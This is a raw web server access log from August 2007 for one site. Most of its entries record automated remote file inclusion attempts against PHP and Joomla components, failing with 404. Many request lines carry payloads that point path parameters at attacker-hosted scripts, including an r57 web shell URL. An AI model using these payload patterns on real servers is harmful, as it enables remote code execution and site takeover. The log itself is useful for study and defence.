65.98.105.162 - - [26/Aug/2007:16:01:08 -0700] "GET /xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:16:01:08 -0700] "GET /logs/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:16:01:49 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.97.20.22 - - [26/Aug/2007:16:03:10 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [26/Aug/2007:16:03:10 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.0.141.110 - - [26/Aug/2007:16:03:21 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [26/Aug/2007:16:03:21 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.241.214.144 - - [26/Aug/2007:16:03:39 -0700] "GET /announcements.php?phpraid_dir=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.36.144.9 - - [26/Aug/2007:16:03:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:16:06:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:16:06:10 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.133.126.181 - - [26/Aug/2007:16:06:33 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.133.126.181 - - [26/Aug/2007:16:06:34 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
75.0.141.110 - - [26/Aug/2007:16:08:47 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:16:09:53 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:16:09:53 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.54.188.106 - - [26/Aug/2007:16:12:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.54.188.106 - - [26/Aug/2007:16:12:50 -0700] "GET / HTTP/1.0" 200 1032 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
75.0.141.110 - - [26/Aug/2007:16:13:23 -0700] "GET /logs/access_070806.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [26/Aug/2007:16:13:24 -0700] "GET /logs/access_070813.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
201.214.161.197 - - [26/Aug/2007:16:13:25 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:16:14:58 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:16:14:58 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.4.224.103 - - [26/Aug/2007:16:15:34 -0700] "GET /logs/access_070813.log HTTP/1.1" 304 - "file://C|\\Documents and Settings\\Administrator\\Desktop\\FF\\FF.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)" "galf.org"
212.241.213.186 - - [26/Aug/2007:16:17:24 -0700] "GET /logs/access_070618.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:16:17:24 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.186 - - [26/Aug/2007:16:17:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:16:18:34 -0700] "GET /logs/access_070618.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:16:18:34 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:16:18:36 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.91.249.99 - - [26/Aug/2007:16:20:12 -0700] "GET /logs/access_070806.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://breakthru.us/images/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.91.249.99 - - [26/Aug/2007:16:20:26 -0700] "GET /logs/access_070813.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://breakthru.us/images/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:16:21:25 -0700] "GET /logs/access_070716.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
136.145.29.18 - - [26/Aug/2007:16:22:30 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4ADBF_enPR223&q=lesbianas" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:16:22:34 -0700] "GET /logs/access_070716.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.54.153.122 - - [26/Aug/2007:16:31:29 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
75.54.153.122 - - [26/Aug/2007:16:31:34 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:34:07 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:34:08 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:34:27 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:34:27 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:34:28 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:34:28 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
128.180.53.19 - - [26/Aug/2007:16:34:28 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:34:28 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:34:30 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:34:31 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:34:31 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:35:31 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:35:31 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:16:36:25 -0700] "GET /index.php?go=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:16:36:25 -0700] "GET /logs/index.php?go=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:37:26 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
128.180.53.19 - - [26/Aug/2007:16:37:26 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.180.53.19 - - [26/Aug/2007:16:37:28 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:37:30 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:37:30 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:37:30 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:37:30 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:37:36 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:37:36 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:37:42 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:37:43 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.117.160.103 - - [26/Aug/2007:16:39:28 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.117.160.103 - - [26/Aug/2007:16:39:28 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.117.160.103 - - [26/Aug/2007:16:39:28 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.117.160.103 - - [26/Aug/2007:16:39:28 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:16:39:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:16:39:29 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.170.77 - - [26/Aug/2007:16:40:11 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.170.77 - - [26/Aug/2007:16:40:11 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.170.77 - - [26/Aug/2007:16:40:14 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.170.77 - - [26/Aug/2007:16:40:15 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.170.77 - - [26/Aug/2007:16:40:37 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.170.77 - - [26/Aug/2007:16:40:38 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:41:03 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:41:03 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:41:03 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:41:03 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.135.48.42 - - [26/Aug/2007:16:41:03 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:41:03 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.252.144.2 - - [26/Aug/2007:16:41:05 -0700] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://trabeco.net/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.252.144.2 - - [26/Aug/2007:16:41:05 -0700] "GET //phpAdsNew/view.inc.php?phpAds_path=http://trabeco.net/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:16:41:22 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:16:41:22 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:16:42:44 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:16:42:44 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:16:42:57 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:16:42:57 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.252.144.2 - - [26/Aug/2007:16:43:16 -0700] "GET /logs/access_070813.log//phpAdsNew/view.inc.php?phpAds_path=http://trabeco.net/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.252.144.2 - - [26/Aug/2007:16:43:16 -0700] "GET /logs/access.log//phpAdsNew/view.inc.php?phpAds_path=http://trabeco.net/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:43:24 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:43:25 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:43:33 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:16:43:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.54.153.122 - - [26/Aug/2007:16:44:03 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
75.54.153.122 - - [26/Aug/2007:16:44:04 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:44:05 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:44:05 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.214.144 - - [26/Aug/2007:16:44:26 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:44:47 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:44:53 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.149.193 - - [26/Aug/2007:16:45:08 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.149.193 - - [26/Aug/2007:16:45:14 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.17.72.133 - - [26/Aug/2007:16:45:29 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.17.72.133 - - [26/Aug/2007:16:45:30 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
